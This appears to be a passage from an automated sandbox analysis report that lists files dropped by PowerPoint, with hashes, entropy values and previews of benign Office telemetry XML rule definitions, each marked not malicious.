                                                                                                                              Entropy (8bit):5.2518417029045175
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5OTnpYoAQierOgAuUdaGodHMpFzOXDzlMNO2su:2d0TZrODfpUoOPC
                                                                                                                              MD5:BC5AD3C23E775317CCF7A14675013187
                                                                                                                              SHA1:ED31E88A1D572B2581C013FD576744CE52D0A3B8
                                                                                                                              SHA-256:1785EC734989C8A1CB4883480D2AB87C90AB840FF400DE201EC8A6826E69B33C
                                                                                                                              SHA-512:17F64BA928CA5E92785A487A577553DD2A779244ABC449CCA0257E290657F32CB3EFDFBE8D1BCC4A03D0FFEECE3BA15570779202EF9169D43E5089F72EAC9C6C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324008" V="2" DC="SM" EN="Office.Extensibility.VbaTelemetryHostMacroRun" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0973" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="HostMacroRunCount">.. <S T="1" F="HostMacroRunCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):606
                                                                                                                              Entropy (8bit):5.259590054998113
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5P7zTnpYoAQierZuUdaGodHMpFzOXDzlMNO2su:2dRzTZrZfpUoOPC
                                                                                                                              MD5:1456F19487B7DAAF0CB140F58A61FC44
                                                                                                                              SHA1:E2B19C49AD5B0EF903A3EDC7F3704B765682B1C2
                                                                                                                              SHA-256:40795BE4CA43C4C656424CEF8FE1ACF9C6CAEDFAE55526791EE0E6628028B01D
                                                                                                                              SHA-512:84E44D0ACF66C5742E8E318CC4FE8025C95431A941C41116C5C750E1CA5C15F0E144BA2F47E40A09F4D58FABBD0B121A3533BFC939C1AEB57F967588854F4C1E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324008" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryHostMacroRun" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4q818" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="HostMacroRunCount">.. <S T="1" F="HostMacroRunCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):610
                                                                                                                              Entropy (8bit):5.235810343917564
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5Cg3lPnpYoAQ8nerORHSuUdaGodHMp0RXMBCMNO2su:2dgg1PrrOhSfpUrcf
                                                                                                                              MD5:6BF1D064B47650E05FBD2A1865F21F77
                                                                                                                              SHA1:7D481B1CAC7A7995C9AE49FAAC7DD6E20E351E92
                                                                                                                              SHA-256:DE7B5730C2BD46DD96526F8264B6ACA3D4207E78FF5E0414F45F613C77048DCB
                                                                                                                              SHA-512:F8C26937B695C754B7758706EAA3E6724A8002684FC4E4190AEBC393EDA8ED79B0969A5DD05BFF1C0C634AF338A37B436DF2957EE7802840135D82ECED61BA2B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324009" V="2" DC="SM" EN="Office.Extensibility.VbaTelemetryMacroRecord" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0974" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="MacroRecordCount">.. <S T="1" F="MacroRecordCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):610
                                                                                                                              Entropy (8bit):5.244242937990392
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5C1z3lPnpYoAQ8neruuUdaGodHMp0RXMBCMNO2su:2dg1z1PrrufpUrcf
                                                                                                                              MD5:3F129EC8F2CCECDFA846545CB18C7E7B
                                                                                                                              SHA1:9A89B36738FE99AC889B7453F4950BD0A8FD4E81
                                                                                                                              SHA-256:BD208947E3410C28DE1BC3E37C027177F02ABB003C8301371190983428AB9C3B
                                                                                                                              SHA-512:844FEA92C15D7A05A61FA11F75B17E2A0751F77E9C61EDFF75766297E541880DB2A180E352E539E48E03CCB7A1DAE3BD601946667A628A13B54CC304A70C2BDD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324009" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryMacroRecord" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="4q817" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="MacroRecordCount">.. <S T="1" F="MacroRecordCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):610
                                                                                                                              Entropy (8bit):5.215451463140198
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5uMtcnpYoAQ8nerONuUdaGodHMpOqXMHhMNO2su:2dztcrrONfpUbqcHe
                                                                                                                              MD5:A58DB991877CAAFE425B26D4FA683925
                                                                                                                              SHA1:A289B137DEF1979F62BCC6EE8F704045C359160C
                                                                                                                              SHA-256:0442E60CB5397E3806B3EBB25F7EE18077C0F6E508082E925CE09E645F0250E7
                                                                                                                              SHA-512:9280404C2226E74310488D79E45D3C60EF687DD5981D3EC7CE7AB99F7DCA73A25609A4399185EDB37C3502B7C1AC12C703D200A7C399E26168068925D66A7F48
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324010" V="2" DC="SM" EN="Office.Extensibility.VbaTelemetryMacroCreate" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0975" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="MacroCreateCount">.. <S T="1" F="MacroCreateCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):610
                                                                                                                              Entropy (8bit):5.221173849484883
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5u5ztcnpYoAQ8nerj7uUdaGodHMpOqXMHhMNO2su:2dMztcrrj7fpUbqcHe
                                                                                                                              MD5:6DBCDB6698401D02351740FC95608805
                                                                                                                              SHA1:1686EEF8C34BE64E16B5AC003B3777CB6DC26012
                                                                                                                              SHA-256:049D7D25332C81902FE8A46CBC0E8AC81F8FA9DCD284FB109E0566C9BD66CDE4
                                                                                                                              SHA-512:B677DFA5E5FBDA1BB1E038E4B1C517ECFE4C5E5B927D8627E6140028D76ACD3814CE092EF200CBE60361A1409F55FB0801DD3AC68FE5C0F429F38D78A872E982
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324010" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryMacroCreate" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="4q816" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="MacroCreateCount">.. <S T="1" F="MacroCreateCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):665
                                                                                                                              Entropy (8bit):5.1613159159603486
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5JxEzi4snpYunerFuUdaGodHMp9LbSOkxzSALW9NO2su:2dyzi4s6rFfpU96z
                                                                                                                              MD5:306ED5B90FDF43E088C810A5F50D1488
                                                                                                                              SHA1:100D2158ADA993D9917274220AD54C15EA030D3A
                                                                                                                              SHA-256:525F22803855666E2C746C0F0CE3C31075C27302DBEB0815CDC1C7D90BBEA31C
                                                                                                                              SHA-512:1EE790C6C660A218957DB45931251FAB79570CAD6B1837763D0CD2B2526587B78D15C697905C224327B9F9A1B5415C389F45F04CB44023D73CCABAF463706370
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324011" V="1" DC="SM" EN="Office.Extensibility.VbaAmsiScanTelemetry" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b6pk1" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="true" N="HashApiName">.. <S T="1" F="HashApiName" M="Ignore" />.. </C>.. <C T="I32" I="3" O="false" N="AmsiResult">.. <S T="1" F="AmsiResult" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1164
                                                                                                                              Entropy (8bit):4.922924554720851
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd50z7npYoAQjerZferXerONXahI6uLauMfap9SzfsS4eCf1yN1xaXAFMeIvfV:2d+z7erZWrOrl/hzUiCtY1sbv5Q2QU
                                                                                                                              MD5:D53EA83142EE5BDF660AA5CEFB8BA10C
                                                                                                                              SHA1:523016F9B90C9F9B508F757AAB545CDDD175A52F
                                                                                                                              SHA-256:157324DF877DD6EB8FBC7BC74ECF11A1A5FD488E940F4BF2EDE8F3ADE299BD47
                                                                                                                              SHA-512:1EE89B9E4D575F625EDF8DCCF54FDB175A4F2C0345BF42D3A90E7290676C2000B0EFA573639CF6C0D358642D291E1ABBF424139E4CC184B02749D1F63436EEBD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324012" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryBreak" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cltx2" />.. <UTS T="2" Id="cltx1" />.. <UTS T="3" Id="cnvgv" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="4" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="MalformedArg1Type">.. <S T="2" F="Arg1" />.. </C>.. <C T="U32" I="2" O="true" N="MalformedArg2Type">.. <S T="2" F="Arg2" />.. </C>.. <C T="U32" I="3" O="true" N="MalformedArg3Type">.. <S T="2" F="Arg3" />.. </C>.. <C T="U32" I="4" O="true" N="ArgCount">.. <S T="1" F="ArgCount" />.. </C>.. <C T="U32" I="5" O="true" N="SolutionType">.. <S T="3" F="SolutionType" />.. </C>.. <C T="U32" I="6" O="true" N="BreakReason">.. <S T=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1023
                                                                                                                              Entropy (8bit):5.08414497026305
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5di4snpYoAQjer1uUddlndytzs8nUUhMnHDd32UAA2YnmZcAwwnVd4AdNO2z:2dzi4ser1f/zWgSh+ADpL
                                                                                                                              MD5:1B6C7ADD75A0826DE7EDD2038C037403
                                                                                                                              SHA1:EE7A845AD41CF49A51E78E89D024C481F5F08E59
                                                                                                                              SHA-256:A38D6B6B07E95851F680F56F8358B14ABB8E28DB44331A5771721205EF5A633F
                                                                                                                              SHA-512:7EEF739343040EA40C9EAD5809ABACED2DD515CD536B84F02D374F2E5FC746ECE5ACA7317C3F0F234EBA01A528CE20AFEF4AA34F28C58A92B4B3DBC1A746977E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324013" V="0" DC="SM" EN="Office.Extensibility.VbaRefSecurityTelemetry" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="9uayh" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="W" I="1" O="false" N="ReferenceZone">.. <S T="1" F="ReferenceZone" />.. </C>.. <C T="W" I="2" O="false" N="SafeStatus">.. <S T="1" F="SafeStatus" />.. </C>.. <C T="B" I="3" O="false" N="UseLeafRefName">.. <S T="1" F="UseLeafRefName" />.. </C>.. <C T="B" I="4" O="false" N="AllowReferenceLoaded">.. <S T="1" F="AllowReferenceLoaded" />.. </C>.. <C T="B" I="5" O="false" N="AllowIntranetReferencesPolicy">.. <S T="1" F="AllowIntranetReferencesPolicy" />.. </C>.. <C T="B" I="6" O="false" N="AllowMotwReferencesPolicy">.. <S T="1" F="AllowMotwReferencesPolicy" />.. </C>.. <T>.. <S T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):715
                                                                                                                              Entropy (8bit):5.186374014667383
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5l1OfhnpYoAQjersuUddAzy+e/wzy+ynteUImGYndKUveNO2su:2dv0fhersf/A2+eY2+DcGuG
                                                                                                                              MD5:68DA5AF9012BFA2A79EF5F7A3005D162
                                                                                                                              SHA1:197D87F64F6F33E233A2A39E321EF8CD0B132AF7
                                                                                                                              SHA-256:FEB6C1014EC5BF37FBED1C2F62470B15E97FE5428FA52BEB1BFFB9FADBD98542
                                                                                                                              SHA-512:BDCB02C12E4F236EC507E497B178020F09C3DBAD59FDBE4DB6FDB26264AE941B081BC4AFD3DFE359D505611736EC369D4C16C662406F6E2A8F831B871A6EE83A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324014" V="0" DC="SM" EN="Office.Extensibility.MacroDigSigSaveHighestVersion" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="9j4qm" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="W" I="1" O="false" N="DigSigVersion">.. <S T="1" F="DigSigVersion" />.. </C>.. <C T="B" I="2" O="false" N="IsDigSigCreated">.. <S T="1" F="IsDigSigCreated" />.. </C>.. <C T="B" I="3" O="false" N="UnderFGEnabledVbaV3Sig">.. <S T="1" F="UnderFGEnabledVbaV3Sig" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):850
                                                                                                                              Entropy (8bit):5.191796263875905
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5V4xyfsuhnpYoAQjer6uUddAzy+e/wzy+yntdrrqX7rrenurnO5jrnynHDhP:2d3tfsuher6f/A2+eY2+mqTFEnAFpQ8
                                                                                                                              MD5:B56B9D5A48835CDF2DE43E018B06B683
                                                                                                                              SHA1:8EB45E99D1794A664D1C0F8DEBFD6EABFAB4EE99
                                                                                                                              SHA-256:667388E62AFD932E44282543EC5314427894C8042B1A378DB42B58022268A91E
                                                                                                                              SHA-512:88C8EB9F2A816680F60B9B7479C24380E60CA7236AFCB929F31785DF23813EA86E0120D3E83526CD74F15B7D859AA682A1F40D1CBEB31159BC8E5870D835B347
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324015" V="0" DC="SM" EN="Office.Extensibility.MacroDigSigVerifyVersion" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="9j4qk" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="W" I="1" O="false" N="DigSigVersion">.. <S T="1" F="DigSigVersion" />.. </C>.. <C T="B" I="2" O="false" N="VerifiedAsValidSignature">.. <S T="1" F="VerifiedAsValidSignature" />.. </C>.. <C T="B" I="3" O="false" N="OnlyTrustVBASignatureV3">.. <S T="1" F="OnlyTrustVBASignatureV3" />.. </C>.. <C T="B" I="4" O="false" N="UnderFGEnabledVerifyVbaV3Sig">.. <S T="1" F="UnderFGEnabledVerifyVbaV3Sig" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):466
                                                                                                                              Entropy (8bit):5.198284707942154
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5YBdTsnpY0erLCyuUdnWQDSpfxQm9NO2su:2d6BxsurrfEY0pZz
                                                                                                                              MD5:6704ADD89A23AC9A343843F66DBD1C55
                                                                                                                              SHA1:3D847251F635CDD481C3DAF0BECBABB3BBEDC36E
                                                                                                                              SHA-256:C6739587B9025728EDEC51A78615D1D312E6B2673E21CC8F7A9A7A7838BA28AF
                                                                                                                              SHA-512:5ABA63AAA7DD72901D3FD684B09BC2C5D069D9230134A3326BE0726F785E31112572703A6B909157C905CAFC5A33D52B160595513B85F9FB174DFAAB362E5D70
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324016" V="0" DC="SM" EN="Office.Extensibility.VBAReferencedVBScript" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4o71g" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="B" I="1" O="false" N="FLoadResult">.. <S T="1" F="fLoadResult" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):8969
                                                                                                                              Entropy (8bit):2.636298184971013
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c/ulx9xPBDBeB1BdBJBgMBExdxFnBtBoBH9BUB4BfBHMf:SuvX51CPHLgA43nX0HYEJHy
                                                                                                                              MD5:790D9A68A7276523F04FE7CE4176AB3A
                                                                                                                              SHA1:637920BE1264152163BF90C0C088A95B41307036
                                                                                                                              SHA-256:E4AE1AA39E26F14C00AFAB23E7AF6FA5752DA966CF1591291088110F9DBEFEAF
                                                                                                                              SHA-512:42C677E84988287C476D0081E3FC30C47E2B9A44B81ED1997E69B8D384EE062686DBE048461E14BF126AF9BBE1B08804CEF3C1C878F452ADA92A8FBAAAD812B4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="325000" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UCSS T="1" C="Scope Summary" S="Medium" />.. <F T="2">.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Tag" />.. </L>.. <R>.. <V V="24486150" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Tag" />.. </L>.. <R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1984
                                                                                                                              Entropy (8bit):4.726824212334375
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d7lqwQc11mXV30chKHuyPjRF4qLPD3RfT0cV0sOczioc8cg:cBQI1s0qWuybRF4q90w0q59j
                                                                                                                              MD5:73331CC39871E1DD5DE7B60E47ECE65B
                                                                                                                              SHA1:936B8FF2C2BB92EEB699858D6DC71B3D12FCA726
                                                                                                                              SHA-256:316E1C267D43144EFBD1066090B318335F173A5C5CC606DBD62B0515401059AC
                                                                                                                              SHA-512:C65D6FF23427E8750C72FF8F3E6043C88BC4EAB85A7EB65108E91616B3A64BCA786637E8C93BFB7CF920B32BC42D3AE1F8CED82C8D7E532BBAA4A522D8AE1C51
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="325001" V="0" DC="SM" EN="Office.Extensibility.Gen1ActivityAggregatedSuccessCountWithTag" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" DCa="DC PSP PSU" xmlns="">.. <RIS>.. <RI N="ActivitySuccess" />.. </RIS>.. <S>.. <R T="1" R="325000" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="3" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <TI T="3" I="10min" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <G I="true" R="TriggerOldest">.. <S T="2">.. <F N="5" />.. <F N="6" />.. <F N="9" />.. <F N="10" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="CollectionStartTime">.. <A T="MIN">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="FT" I="1" O="false" N="CollectionEndTime">.. <A T="MAX">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="W" I="2
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2054
                                                                                                                              Entropy (8bit):4.694742156542357
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d1wQc1/V30cYIHuyPiKpFYhLPD3RfT0cTqC8vwfu+cjcg:caQIl0GuyPFYh900qLiWj
                                                                                                                              MD5:8CF243184B7712F497B1CF81D7ECAD4A
                                                                                                                              SHA1:CA485BBFBD18480C60459C0F1B69EFD501F91C7F
                                                                                                                              SHA-256:1FE12ADF3484ED9D4EE4879C0A8D7E644B34AC72880C587B209EFE8D6298AB38
                                                                                                                              SHA-512:66E9166991E7B993FE55E2B4AFD306DD556ED0BE2A8325F28B5F7F0596A51866ED68E087AD0170F6E42FFEAFB19C7558AD857ADF3B12355E75BD44F1EF7407DC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="325002" V="0" DC="SM" EN="Office.Extensibility.Gen1ActivityAggregatedFailureCount" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" DCa="DC PSP PSU" xmlns="">.. <RIS>.. <RI N="ActivityFailure" />.. </RIS>.. <S>.. <R T="1" R="325000" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="3" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </F>.. <TI T="3" I="30s" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="2">.. <F N="4" />.. <F N="5" />.. <F N="6" />.. <F N="9" />.. <F N="10" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="CollectionStartTime">.. <A T="MIN">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="FT" I="1" O="false" N="CollectionEndTime">.. <A T="MAX">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="W" I="2" O="false" N="A
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):873
                                                                                                                              Entropy (8bit):5.282127875194043
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5TKO3m0P+ygAQjer5C/gSu87rRKfDAfnImTF1SDfnjNAoHyt6nCm/vnCqTa+:2dBKQLntr3b87rRK8Qsar9HJlHYti
                                                                                                                              MD5:26B3C17E7D1F12992CF194D357F7C81A
                                                                                                                              SHA1:CCE3C01F5D1521EF82D9CDC04715B4333CD97A08
                                                                                                                              SHA-256:8ABE02EF78232CE028B9B0413FAE67FFCA3BE996E0E0AD060837C8CB739AADF8
                                                                                                                              SHA-512:6CC9C28057CEAE3FADD7E21D60AF2830145E000BE827833955212DE79A02A4C2265CF43CD48DA14859ECFB92436E9F6241E0A57AD08F62F33064E8A49B009D51
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="360000" V="3" DC="SM" EN="Office.Compliance.FileFormatBallotDisplayedOnFirstBoot" ATT="7027c5657baa4c8c94c98ed600467c8c-81874f32-dbc1-42fc-b25b-12494e65c25f-7401" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qcp8" A="a70ri" />.. <SS T="2" G="{233c7b3b-96db-42f9-9cd7-2a3dc93947e8}" />.. <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" />.. </S>.. <C T="U32" I="0" O="false" N="FileFormatBallotBoxDisplayedOnFirstBoot">.. <S T="1" F="DisplayedValue" />.. </C>.. <C T="U32" I="1" O="false" N="FileFormatBallotBoxAppIDBootedOnce">.. <S T="1" F="AppID" />.. </C>.. <C T="I32" I="2" O="false" N="CountryRegion">.. <S T="2" F="CountryRegion" />.. </C>.. <C T="G" I="3" O="true" N="ACIDValue">.. <S T="3" F="Acid" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):447
                                                                                                                              Entropy (8bit):5.29989390626452
                                                                                                                              Encrypted:false
